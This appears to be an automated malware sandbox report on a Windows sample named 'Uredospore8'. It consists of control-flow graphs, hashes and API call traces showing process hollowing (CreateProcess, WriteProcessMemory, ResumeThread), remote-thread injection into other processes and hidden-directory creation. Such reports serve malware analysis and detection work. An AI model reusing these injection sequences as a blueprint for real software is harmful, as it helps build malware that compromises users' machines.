              • Opcode Fuzzy Hash: 5bfbbd12606dd50e58570d659215e4fe04599de5ad0ca88f87aebfa80355d611
              • Instruction Fuzzy Hash: D5A2153591B731DFC2D3DB34804296EFB15EE37B02748439BE402B5AB9C33A94269796

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 298 700655-700672 NtWriteVirtualMemory 299 700f82-700fa0 call 700677 call 700fa5 298->299
              APIs
              • NtWriteVirtualMemory.NTDLL(?,?,00700F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0070066F
              Memory Dump Source
              • Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd
              Similarity
              • API ID: MemoryVirtualWrite
              • String ID:
              • API String ID: 3527976591-0
              • Opcode ID: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
              • Instruction ID: a6c69d0c4065345ed622d8600f7a2d23cb396b7016b60a82b1942f916b41946b
              • Opcode Fuzzy Hash: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
              • Instruction Fuzzy Hash: 02F0AE74244601EFD328DF44C989B64B7E2FB58320F158599E9898B3A2CB31A950DB84

              Control-flow Graph

              APIs
              • #539.MSVBVM60(?,000000F2,0000001E,00000009), ref: 0040D025
              • __vbaVarMove.MSVBVM60 ref: 0040D037
              • #664.MSVBVM60(?,?,?,?,?), ref: 0040D083
              • __vbaVarMove.MSVBVM60 ref: 0040D092
              • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0040D0AF
              • #546.MSVBVM60(?), ref: 0040D0B8
              • #547.MSVBVM60(?,?), ref: 0040D0C6
              • __vbaI2Var.MSVBVM60(?), ref: 0040D0D0
              • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040D0E0
              • __vbaVarDup.MSVBVM60 ref: 0040D102
              • #606.MSVBVM60(000000B3,?), ref: 0040D111
              • __vbaStrMove.MSVBVM60 ref: 0040D11C
              • __vbaFreeVar.MSVBVM60 ref: 0040D125
              • __vbaR8FixI4.MSVBVM60 ref: 0040D131
              • #678.MSVBVM60(6B480000,4202A32C,?,?,?,?,00000008,?), ref: 0040D17C
              • EnumChildWindows.USER32(00000000,00401761,00000000), ref: 0040D198
              • __vbaNew2.MSVBVM60(00409794,0040E3D4), ref: 0040D1B0
              • __vbaObjSetAddref.MSVBVM60(?,004010D0), ref: 0040D1C9
              • __vbaHresultCheckObj.MSVBVM60(00000000,02992D14,00409784,00000010), ref: 0040D1E9
              • __vbaFreeObj.MSVBVM60 ref: 0040D1F2
              • __vbaFreeStr.MSVBVM60(0040D24C), ref: 0040D235
              • __vbaFreeVar.MSVBVM60 ref: 0040D244
              • __vbaFreeVar.MSVBVM60 ref: 0040D249
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd
              Similarity
              • API ID: __vba$Free$Move$List$#539#546#547#606#664#678AddrefCheckChildEnumHresultNew2Windows
              • String ID: CIAO
              • API String ID: 68011276-3635395781
              • Opcode ID: e26fa3269170dbc251f338622338ba14760696f1e1047a3d096c72d52f577592
              • Instruction ID: a33c6a46b01e7c3e7cedbf572dd9c782a15f98d0848ce9d799199b7533edd150
              • Opcode Fuzzy Hash: e26fa3269170dbc251f338622338ba14760696f1e1047a3d096c72d52f577592
              • Instruction Fuzzy Hash: 087115B1C00219DFDB10CF94DD84ADEBBB8FB48700F10816AE559A72A4DB745A89CFA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 292 403b97-403c5c 294 403c5f-403c97 292->294 294->294 295 403c99-403e84 VirtualAlloc 294->295 296 403e87-403ed7 295->296 296->296 297 403ed9-403ef5 296->297
              APIs
              • VirtualAlloc.KERNELBASE(00000000,00006000,00001000,00000040,00401001), ref: 00403D5A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID: pppp
              • API String ID: 4275171209-1638932250
              • Opcode ID: f8c26fc1a1590d8ec7b0653796c14533c9a8507a6d7e1b4c277861fab6c1b922
              • Instruction ID: d7f750331726ee9bd2a85d74b0bd4d950336cd9fd34a28140c0adc5f56aa0888
              • Opcode Fuzzy Hash: f8c26fc1a1590d8ec7b0653796c14533c9a8507a6d7e1b4c277861fab6c1b922
              • Instruction Fuzzy Hash: A281060AE37F3A09E1D3B1711A16A22E9456F7708A906CF6FBD20F5992772FD68F1014

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 417 4030c1-4030c2 418 4030c5-4030ce 417->418 418->418 419 4030d0-403f30 GetPEB call 4039a5 418->419 424 403f35-403f40 419->424 425 403f22-403f26 424->425 426 403f42 424->426 425->424 425->425 426->424 427 403f44 426->427 428 403f46-403f5b 427->428 429 403f7a 427->429 430 403ff3-404008 429->430 431 403f7c-403f86 429->431 432 403fc9-403fdb 430->432 433 40400a-40401b 430->433 434 403f88-403f8e 431->434 435 403fde-403ff0 431->435 436 403fa3-403fa5 432->436 437 403fdd 432->437 442 404034-40405b 433->442 443 40401d-404024 433->443 440 403f8f-403f9e 434->440 435->430 436->440 441 403fa7-403fa8 436->441 437->435 440->436 445 404027-404028 441->445 446 403faa 441->446 443->445 447 404091-4040b2 445->447 448 40402a-404031 445->448 446->432 450 4040e3-4040ef 447->450 451 4040b4-4040da 447->451 448->442 453 404106-40410d 450->453 452 4040de 451->452 454 404086 452->454 455 4040df-4040e2 452->455 456 40410e-404139 453->456 454->452 457 404088-4040b2 454->457 459 40416a 456->459 460 40413b-404153 456->460 457->450 457->451 462 4041a6-4041c0 459->462 463 40416d-40416f 459->463 460->453 461 404155-404168 460->461 461->459 464 4041c2-404221 462->464 465 4041e5-4041e6 462->465 463->456 475 404240-40424f 464->475 476 404223 464->476 466 404220-404228 465->466 467 4041e8-4041eb 465->467 469 404209-40421b 466->469 470 40422a-404238 466->470 468 404217-40421a 467->468 473 40421d 468->473 469->473 472 40423a 470->472 470->473 477 40423c 472->477 478 40423e 472->478 473->468 488 4041d7-4041dd 473->488 479 40427d 475->479 481 404272-40427c 476->481 482 404225-404228 476->482 477->475 478->475 484 404250-404259 479->484 485 40427f-404282 479->485 481->479 482->469 482->470 484->468 487 40425b 484->487 489 404287 485->489 487->481 490 4041e1 488->490 489->489 490->490 491 4041e3 490->491 491->465
              Memory Dump Source
              • Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d65569573e07257ad461f0ca0e0430b6896c08c376a550da6aaae3cb65358a8
              • Instruction ID: 72500eb02440e067f8e634ee46afb044d1c51410e5f63b9188851a833be2c6e2
              • Opcode Fuzzy Hash: 1d65569573e07257ad461f0ca0e0430b6896c08c376a550da6aaae3cb65358a8
              • Instruction Fuzzy Hash: F222C60DE3BF3645E1D3A1311622A62EE005F7708A546DB6FB924B49A2772FE7CF1118

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 492 4030cd-403f30 GetPEB call 4039a5 497 403f35-403f40 492->497 498 403f22-403f26 497->498 499 403f42 497->499 498->497 498->498 499->497 500 403f44 499->500 501 403f46-403f5b 500->501 502 403f7a 500->502 503 403ff3-404008 502->503 504 403f7c-403f86 502->504 505 403fc9-403fdb 503->505 506 40400a-40401b 503->506 507 403f88-403f8e 504->507 508 403fde-403ff0 504->508 509 403fa3-403fa5 505->509 510 403fdd 505->510 515 404034-40405b 506->515 516 40401d-404024 506->516 513 403f8f-403f9e 507->513 508->503 509->513 514 403fa7-403fa8 509->514 510->508 513->509 518 404027-404028 514->518 519 403faa 514->519 516->518 520 404091-4040b2 518->520 521 40402a-404031 518->521 519->505 523 4040e3-4040ef 520->523 524 4040b4-4040da 520->524 521->515 526 404106-40410d 523->526 525 4040de 524->525 527 404086 525->527 528 4040df-4040e2 525->528 529 40410e-404139 526->529 527->525 530 404088-4040b2 527->530 532 40416a 529->532 533 40413b-404153 529->533 530->523 530->524 535 4041a6-4041c0 532->535 536 40416d-40416f 532->536 533->526 534 404155-404168 533->534 534->532 537 4041c2-404221 535->537 538 4041e5-4041e6 535->538 536->529 548 404240-40424f 537->548 549 404223 537->549 539 404220-404228 538->539 540 4041e8-4041eb 538->540 542 404209-40421b 539->542 543 40422a-404238 539->543 541 404217-40421a 540->541 546 40421d 541->546 542->546 545 40423a 543->545 543->546 550 40423c 545->550 551 40423e 545->551 546->541 561 4041d7-4041dd 546->561 552 40427d 548->552 554 404272-40427c 549->554 555 404225-404228 549->555 550->548 551->548 557 404250-404259 552->557 558 40427f-404282 552->558 554->552 555->542 555->543 557->541 560 40425b 557->560 562 404287 558->562 560->554 563 4041e1 561->563 562->562 563->563 564 4041e3 563->564 564->538
              Memory Dump Source
              • Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e88472a803ece5242e52ce481e4c448b9e30868ba3e2a09efb65a7ed66c7764
              • Instruction ID: 86d6a3a8e447b93f2027ee28c82682b75ed2f1a3e41300e0a631f83723efb331
              • Opcode Fuzzy Hash: 9e88472a803ece5242e52ce481e4c448b9e30868ba3e2a09efb65a7ed66c7764
              • Instruction Fuzzy Hash: 0B22B60DE3BF7645E1D3A1311622A62EE005F7708A546DB6FB920B49A2772FE7CF1118

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 565 4039a5-4039d7 566 4039db-403a0f 565->566 567 403a60-403a6e 566->567 568 403a11-403a32 566->568 570 403a73-403ac0 567->570 568->566 569 403a34-403a4c 568->569 570->570 571 403ac2-403ad7 570->571 571->570 572 403ad9-403f0a call 403b97 571->572 575 403f0f-403f1d 572->575 576 403f20 575->576 577 403f8e 575->577 578 403f22-403f26 576->578 579 403f8f-403f9e 577->579 578->578 580 403f35-403f40 578->580 583 403fa3-403fa5 579->583 580->578 582 403f42 580->582 582->580 584 403f44 582->584 583->579 585 403fa7-403fa8 583->585 586 403f46-403f5b 584->586 587 403f7a 584->587 588 404027-404028 585->588 589 403faa 585->589 590 403ff3-404008 587->590 591 403f7c-403f86 587->591 592 404091-4040b2 588->592 593 40402a-404031 588->593 594 403fc9-403fdb 589->594 590->594 596 40400a-40401b 590->596 597 403f88-403f8b 591->597 598 403fde-403ff0 591->598 600 4040e3-4040ef 592->600 601 4040b4-4040da 592->601 599 404034-40405b 593->599 594->583 595 403fdd 594->595 595->598 596->599 610 40401d-404024 596->610 597->577 598->590 604 404106-40410d 600->604 602 4040de 601->602 606 404086 602->606 607 4040df-4040e2 602->607 608 40410e-404139 604->608 606->602 609 404088-4040b2 606->609 612 40416a 608->612 613 40413b-404153 608->613 609->600 609->601 610->588 615 4041a6-4041c0 612->615 616 40416d-40416f 612->616 613->604 614 404155-404168 613->614 614->612 617 4041c2-404221 615->617 618 4041e5-4041e6 615->618 616->608 628 404240-40424f 617->628 629 404223 617->629 619 404220-404228 618->619 620 4041e8-4041eb 618->620 622 404209-40421b 619->622 623 40422a-404238 619->623 621 404217-40421a 620->621 626 40421d 621->626 622->626 625 40423a 623->625 623->626 630 40423c 625->630 631 40423e 625->631 626->621 641 4041d7-4041dd 626->641 632 40427d 628->632 634 404272-40427c 629->634 635 404225-404228 629->635 630->628 631->628 637 404250-404259 632->637 638 40427f-404282 632->638 634->632 635->622 635->623 637->621 640 40425b 637->640 642 404287 638->642 640->634 643 4041e1 641->643 642->642 643->643 644 4041e3 643->644 644->618
              Memory Dump Source
              • Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3df3f4a001aef29bf2a9eee76e5be131c1ff486a7cf645ba8a700012df1085e5
              • Instruction ID: f363ba01090f7a853829062e15176908a825571c435fd1290d5beec9908c03d4
              • Opcode Fuzzy Hash: 3df3f4a001aef29bf2a9eee76e5be131c1ff486a7cf645ba8a700012df1085e5
              • Instruction Fuzzy Hash: 10D1421692A7614EC783CA304940992FF64BFB334570487AFE951BB983E33E964F8349
              Memory Dump Source
              • Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 521f89343bccef5a24265a5417f55be21c5412d8132cbe37ccf962384ea1066f
              • Instruction ID: 68294241099afda18948e7f99c5e71e07d0212d5baf5775832ff062dfcc58f24
              • Opcode Fuzzy Hash: 521f89343bccef5a24265a5417f55be21c5412d8132cbe37ccf962384ea1066f
              • Instruction Fuzzy Hash: 2F118E70600941CFDB25CF54C090B6577A1FB8A325F11C26DDA464B3AAD639BC42CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
              • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
              • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
              • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

              Execution Graph

              Execution Coverage:6.7%
              Dynamic/Decrypted Code Coverage:99%
              Signature Coverage:6.9%
              Total number of Nodes:421
              Total number of Limit Nodes:6
              execution_graph 3007 401000 3008 40100c VirtualAlloc 3007->3008 3011 40106d 3008->3011 3012 40107e 3011->3012 3277 6d4a6d 3278 6d4a88 3277->3278 3281 6d4996 3278->3281 3280 6d4a96 3282 6d49ae 3281->3282 3284 6d49ca 3282->3284 3285 6d27d7 3282->3285 3284->3280 3286 6d27e8 3285->3286 3287 6d2656 7 API calls 3286->3287 3288 6d2829 3287->3288 3295 6d2845 3288->3295 3291 6d2851 3293 6d2764 4 API calls 3291->3293 3294 6d286a 3291->3294 3292 6d2764 4 API calls 3292->3291 3293->3291 3294->3284 3297 6d284a 3295->3297 3296 6d2764 4 API calls 3296->3297 3297->3296 3298 6d283c 3297->3298 3298->3291 3298->3292 3373 6d4ecc 3374 6d4ed9 3373->3374 3375 6d4ef5 3373->3375 3374->3375 3376 6d4eeb SetEvent 3374->3376 3376->3375 3377 6d154c 3378 6d377f 3377->3378 3379 6d1551 LoadLibraryA 3378->3379 3380 6d0d01 GetProcAddress 3379->3380 3381 6d1567 3380->3381 3382 6d13aa 3 API calls 3381->3382 3383 6d1580 3382->3383 3384 6d13aa 3 API calls 3383->3384 3385 6d1599 3384->3385 3386 6d13aa 3 API calls 3385->3386 3387 6d15b2 3386->3387 3388 6d13aa 3 API calls 3387->3388 3389 6d15cb 3388->3389 3390 6d13aa 3 API calls 3389->3390 3391 6d15e4 3390->3391 3392 6d13aa 3 API calls 3391->3392 3393 6d15fd 3392->3393 3473 6d4ca8 3474 6d4cbb 3473->3474 3475 6d4cf1 3474->3475 3477 6d4df7 3474->3477 3479 6d4e29 3477->3479 3478 6d4e7a 3478->3475 3479->3478 3480 6d2764 4 API calls 3479->3480 3480->3478 3299 6d16e4 3300 6d171b 3299->3300 3301 6d16f6 3299->3301 3302 6d0e45 4 API calls 3301->3302 3302->3300 3565 6d4b04 3566 6d4b17 3565->3566 3567 6d4c0a 3566->3567 3568 6d4b55 CreateEventA 3566->3568 3569 6d4b78 3568->3569 3569->3567 3570 6d4efa WaitForSingleObject 3569->3570 3570->3569 3303 6d0667 3304 6d066a 3303->3304 3305 6d0675 46 API calls 3304->3305 3013 6d0000 3015 6d0005 3013->3015 3062 6d0d29 3015->3062 3022 6d003a 3023 6d038b 3022->3023 3024 6d066d 3022->3024 3025 6d0623 3022->3025 3026 6d05f3 3022->3026 3033 6d0633 3022->3033 3034 6d064e 3022->3034 3075 6d0675 3024->3075 3027 6d0671 3025->3027 3030 6d06a7 3025->3030 3031 6d0658 3025->3031 3025->3033 3044 6d069f 3025->3044 3026->3025 3026->3027 3026->3031 3032 6d068b 3026->3032 3026->3033 3037 6d068a CreateMutexA 3026->3037 3038 6d069d 3026->3038 3027->3032 3027->3037 3029 6d0675 46 API calls 3030->3044 3031->3029 3036 6d06ac 45 API calls 3032->3036 3033->3034 3035 6d06c3 3033->3035 3033->3044 3034->3031 3034->3035 3034->3044 3108 6d2605 3035->3108 3039 6d06a3 3036->3039 3037->3032 3080 6d06ac 3038->3080 3044->3030 3044->3035 3105 6d0d01 3044->3105 3129 6d0ca4 GetPEB 3062->3129 3064 6d0d2e 3065 6d0d01 GetProcAddress 3064->3065 3066 6d0011 3065->3066 3067 6d34d2 3066->3067 3068 6d34f2 3067->3068 3131 6d3511 GetVolumeInformationA 3068->3131 3070 6d0016 3071 6d09cc OpenMutexA 3070->3071 3072 6d09f4 GetStartupInfoA 3071->3072 3073 6d001b ExitProcess 3071->3073 3133 6d0a3e 3072->3133 3073->3022 3076 6d068a CreateMutexA 3075->3076 3077 6d0690 3076->3077 3078 6d06ac 45 API calls 3077->3078 3079 6d06a3 3078->3079 3081 6d377f 3080->3081 3082 6d06b1 LoadLibraryA 3081->3082 3083 6d06be 3082->3083 3084 6d0d01 GetProcAddress 3083->3084 3085 6d06c3 3084->3085 3086 6d2605 2 API calls 3085->3086 3087 6d06d6 3086->3087 3088 6d06f2 31 API calls 3087->3088 3089 6d06e9 lstrcat lstrcmpiA 3088->3089 3090 6d083c Sleep 3089->3090 3091 6d0729 Sleep 3089->3091 3090->3090 3224 6d256f 3091->3224 3106 6d0d07 GetProcAddress 3105->3106 3106->3106 3107 6d0d25 3106->3107 3107->3035 3274 6d2634 3108->3274 3110 6d06d6 3111 6d06f2 3110->3111 3112 6d377f 3111->3112 3113 6d06f7 lstrcat lstrcmpiA 3112->3113 3114 6d083c Sleep 3113->3114 3115 6d0729 Sleep 3113->3115 3114->3114 3116 6d256f 3 API calls 3115->3116 3117 6d0743 CreateDirectoryA SetFileAttributesA 3116->3117 3118 6d2656 7 API calls 3117->3118 3119 6d0776 CreateDirectoryA SetFileAttributesA 3118->3119 3120 6d2605 2 API calls 3119->3120 3121 6d07a9 CreateDirectoryA SetFileAttributesA 3120->3121 3122 6d07cd VirtualAlloc 3121->3122 3122->3122 3123 6d07e5 3122->3123 3124 6d26f1 4 API calls 3123->3124 3126 6d0802 3123->3126 3124->3123 3125 6d2764 4 API calls 3125->3126 3126->3125 3127 6d0821 VirtualFree 3126->3127 3128 6d0864 lstrlen 3127->3128 3128->3114 3130 6d0cb0 3129->3130 3130->3064 3130->3130 3132 6d3533 3131->3132 3132->3070 3146 6d377f 3133->3146 3135 6d0a43 CreateProcessA 3136 6d0b51 3135->3136 3137 6d0a53 Wow64GetThreadContext 3135->3137 3148 6d0b58 3136->3148 3137->3136 3139 6d0a7b VirtualProtectEx 3137->3139 3139->3136 3141 6d0aa6 DuplicateHandle 3139->3141 3140 6d0b56 3140->3073 3141->3136 3142 6d0ae7 WriteProcessMemory 3141->3142 3142->3136 3143 6d0b15 ResumeThread 3142->3143 3144 6d0b26 Sleep OpenMutexA 3143->3144 3144->3140 3145 6d0b4c 3144->3145 3145->3136 3145->3144 3147 6d3791 3146->3147 3147->3135 3147->3147 3150 6d0b66 3148->3150 3151 6d0d29 2 API calls 3150->3151 3152 6d0b72 3151->3152 3170 6d0b8c 3152->3170 3154 6d0b85 3155 6d0b91 LoadLibraryA 3154->3155 3156 6d0d01 GetProcAddress 3155->3156 3157 6d0ba7 3156->3157 3187 6d0bca 3157->3187 3159 6d0bbc 3160 6d0c11 3159->3160 3162 6d0be2 OpenProcess 3159->3162 3205 6d0906 3160->3205 3162->3160 3164 6d0bf3 3162->3164 3199 6d0e45 VirtualAllocEx 3164->3199 3168 6d0c09 ExitProcess 3171 6d377f 3170->3171 3172 6d0b91 LoadLibraryA 3171->3172 3173 6d0d01 GetProcAddress 3172->3173 3174 6d0ba7 3173->3174 3175 6d0bca 33 API calls 3174->3175 3176 6d0bbc 3175->3176 3177 6d0c11 3176->3177 3179 6d0be2 OpenProcess 3176->3179 3178 6d0906 33 API calls 3177->3178 3180 6d0c16 3178->3180 3179->3177 3181 6d0bf3 3179->3181 3182 6d0ca4 GetPEB 3180->3182 3183 6d0e45 4 API calls 3181->3183 3186 6d0c1b 3182->3186 3184 6d0bfe 3183->3184 3184->3177 3185 6d0c09 ExitProcess 3184->3185 3186->3154 3188 6d0bcf 3187->3188 3189 6d0c11 3188->3189 3191 6d0be2 OpenProcess 3188->3191 3190 6d0906 34 API calls 3189->3190 3192 6d0c16 3190->3192 3191->3189 3193 6d0bf3 3191->3193 3194 6d0ca4 GetPEB 3192->3194 3195 6d0e45 4 API calls 3193->3195 3198 6d0c1b 3194->3198 3196 6d0bfe 3195->3196 3196->3189 3197 6d0c09 ExitProcess 3196->3197 3198->3159 3200 6d0e75 WriteProcessMemory 3199->3200 3204 6d0bfe 3199->3204 3201 6d0e93 3200->3201 3200->3204 3202 6d0e9a IsWow64Process 3201->3202 3203 6d0ec5 CreateRemoteThread 3201->3203 3202->3203 3202->3204 3203->3204 3204->3160 3204->3168 3206 6d090c 3205->3206 3208 6d092c 3206->3208 3209 6d0d29 2 API calls 3208->3209 3210 6d0938 3209->3210 3211 6d093d CreateThread CreateThread 3210->3211 3215 6d0d4d 3211->3215 3216 6d0d68 CreateToolhelp32Snapshot 3215->3216 3216->3216 3217 6d0d77 Sleep Process32First 3216->3217 3218 6d0e1a CloseHandle Sleep 3217->3218 3219 6d0dac 3217->3219 3218->3216 3220 6d0dca OpenProcess 3219->3220 3221 6d0df3 Process32Next 3219->3221 3222 6d0e45 4 API calls 3219->3222 3220->3219 3220->3221 3221->3218 3221->3219 3223 6d0ded CloseHandle 3222->3223 3223->3221 3246 6d25a3 3224->3246 3247 6d377f 3246->3247 3248 6d25a8 ExpandEnvironmentStringsA 3247->3248 3251 6d25e0 3248->3251 3250 6d25c1 3252 6d377f 3251->3252 3253 6d25e5 lstrcat lstrcat 3252->3253 3253->3250 3275 6d377f 3274->3275 3276 6d2639 ExpandEnvironmentStringsA lstrcat 3275->3276 3276->3110 3394 6d2a43 3395 6d377f 3394->3395 3396 6d2a48 lstrcat 3395->3396 3397 6d2a4f VirtualAlloc 3396->3397 3397->3397 3398 6d2a67 Sleep 3397->3398 3402 6d2aac 3398->3402 3403 6d2ab1 3402->3403 3404 6d2a82 Sleep 3403->3404 3409 6d2abb 3403->3409 3405 6d2aac 17 API calls 3404->3405 3407 6d2a9d 3405->3407 3410 6d26f1 CreateFileA GetFileSize ReadFile CloseHandle 3409->3410 3411 6d2764 CreateFileA SetFilePointer WriteFile CloseHandle 3409->3411 3412 6d2b1c DeleteFileA 3409->3412 3413 6d2b60 DeleteFileA 3409->3413 3414 6d2bc6 Sleep 3409->3414 3415 6d2bb0 DeleteFileA 3409->3415 3416 6d2bdf 3409->3416 3421 6d3623 3409->3421 3410->3409 3411->3409 3412->3409 3413->3409 3414->3409 3415->3414 3419 6d2bf0 3416->3419 3417 6d2d61 Sleep 3417->3417 3417->3419 3418 6d2c4b Sleep 3418->3419 3419->3417 3419->3418 3420 6d2e17 3419->3420 3420->3409 3426 6d364e 3421->3426 3424 6d3658 3424->3409 3425 6d27d7 11 API calls 3425->3424 3427 6d3653 3426->3427 3428 6d27d7 11 API calls 3427->3428 3429 6d3646 3428->3429 3429->3424 3429->3425 3481 6d4a23 3482 6d4a3e 3481->3482 3483 6d4996 11 API calls 3482->3483 3484 6d4a4c 3483->3484 3430 6d00dd 3449 6d00e1 3430->3449 3431 6d038b 3432 6d066d 3434 6d0675 46 API calls 3432->3434 3433 6d0671 3438 6d068b 3433->3438 3444 6d068a CreateMutexA 3433->3444 3434->3433 3435 6d0675 46 API calls 3436 6d0658 3436->3435 3437 6d069f 3440 6d06c3 3437->3440 3447 6d0d01 GetProcAddress 3437->3447 3441 6d06ac 45 API calls 3438->3441 3439 6d0633 3439->3436 3439->3437 3439->3440 3448 6d2605 2 API calls 3440->3448 3446 6d06a3 3441->3446 3442 6d05f3 3442->3433 3442->3436 3442->3438 3442->3439 3443 6d0623 3442->3443 3442->3444 3445 6d069d 3442->3445 3443->3433 3443->3436 3443->3437 3443->3439 3444->3438 3450 6d06ac 45 API calls 3445->3450 3447->3440 3451 6d06d6 3448->3451 3449->3431 3449->3432 3449->3439 3449->3442 3449->3443 3450->3437 3452 6d06f2 31 API calls 3451->3452 3453 6d06e9 lstrcat lstrcmpiA 3452->3453 3454 6d083c Sleep 3453->3454 3455 6d0729 Sleep 3453->3455 3454->3454 3456 6d256f 3 API calls 3455->3456 3457 6d0743 CreateDirectoryA SetFileAttributesA 3456->3457 3458 6d2656 7 API calls 3457->3458 3459 6d0776 CreateDirectoryA SetFileAttributesA 3458->3459 3460 6d2605 2 API calls 3459->3460 3461 6d07a9 CreateDirectoryA SetFileAttributesA 3460->3461 3462 6d07cd VirtualAlloc 3461->3462 3462->3462 3463 6d07e5 3462->3463 3464 6d26f1 4 API calls 3463->3464 3466 6d0802 3463->3466 3464->3463 3465 6d2764 4 API calls 3465->3466 3466->3465 3467 6d0821 VirtualFree 3466->3467 3468 6d0864 lstrlen 3467->3468 3468->3454 3469 6d305f 3470 6d3064 3469->3470 3471 6d306a lstrlen 3470->3471 3472 6d3081 3471->3472 3485 6d3fb8 3486 6d377f 3485->3486 3487 6d3fbd LoadLibraryA 3486->3487 3488 6d3fc7 3487->3488 3489 6d3fe3 3487->3489 3491 6d0d01 GetProcAddress 3488->3491 3506 6d4002 3489->3506 3493 6d3fd9 3491->3493 3492 6d3fde 3495 6d4241 3493->3495 3519 6d3adf VirtualAlloc 3495->3519 3497 6d4246 3521 6d3933 VirtualAlloc 3497->3521 3499 6d424b 3500 6d13aa 3 API calls 3499->3500 3501 6d4264 3500->3501 3502 6d13aa 3 API calls 3501->3502 3503 6d427d 3502->3503 3504 6d13aa 3 API calls 3503->3504 3505 6d4296 3504->3505 3505->3492 3507 6d4007 3506->3507 3508 6d4030 3507->3508 3509 6d4020 GetModuleHandleA 3507->3509 3527 6d4071 3508->3527 3523 6d4142 3509->3523 3512 6d402e 3512->3492 3514 6d4071 12 API calls 3515 6d404f Sleep 3514->3515 3516 6d4071 12 API calls 3515->3516 3517 6d405f Sleep 3516->3517 3517->3512 3518 6d4071 12 API calls 3517->3518 3518->3512 3519->3519 3520 6d3af7 RtlInitializeCriticalSection 3519->3520 3520->3497 3521->3521 3522 6d394b CreateThread 3521->3522 3522->3499 3525 6d4155 3523->3525 3524 6d41bd 3524->3512 3525->3524 3526 6d4241 7 API calls 3525->3526 3526->3524 3528 6d4087 GetPEB 3527->3528 3529 6d403f Sleep 3527->3529 3530 6d4096 3528->3530 3529->3514 3530->3529 3532 6d40f1 3530->3532 3533 6d377f 3532->3533 3534 6d40f6 GetProcAddress 3533->3534 3535 6d4096 3534->3535 3536 6d4101 Sleep 3534->3536 3538 6d40c1 3535->3538 3540 6d40f1 9 API calls 